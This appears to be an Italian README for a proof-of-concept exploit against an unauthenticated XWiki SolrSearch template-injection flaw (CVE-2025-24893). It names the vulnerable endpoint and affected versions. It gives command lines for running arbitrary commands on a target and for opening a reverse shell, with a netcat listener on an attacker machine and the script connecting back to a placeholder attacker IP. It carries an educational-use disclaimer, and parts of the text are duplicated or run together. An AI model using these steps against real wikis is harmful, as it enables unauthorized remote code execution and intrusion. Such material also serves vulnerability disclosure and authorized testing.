
PoC di RCE non autenticata per XWiki SolrSearch (CVE-2025-24893). Esecuzione di comandi + reverse shell.
PoC RCE non autenticata per XWiki SolrSearch (CVE-2025-24893). Esecuzione comandi + reverse shell.
Proof-of-concept per l'iniezione di template SolrSearch di XWiki che porta all'esecuzione remota di codice non autenticata.
Testato su XWiki Debian 15.10.8 (corretto in 15.10.11 / 16.4.1 / 16.5.0RC1).
⚠️ Solo uso educativo. Non eseguirlo contro sistemi di cui non sei proprietario o per cui non hai esplicito permesso di test.
/xwiki/bin/get/Main/SolrSearch.pip install requests
Specifica l'host di destinazione (e il percorso opzionale) quando esegui lo script.
Esegui comandi di base:
python3 xwiki_solr_rce.py --target http://wiki.example.tld cmd --cmd "id"
python3 xwiki_solr_rce.py --target http://wiki.example.tld cmd --cmd "whoami"
Avvia una reverse shell:
# On attacker box
nc -lvnp 4444
# From the PoC
python3 xwiki_solr_rce.py --target http://wiki.example.tld rshell <attacker_ip> 4444
/xwiki/bin/get/Main/SolrSearch?media=rss&text=...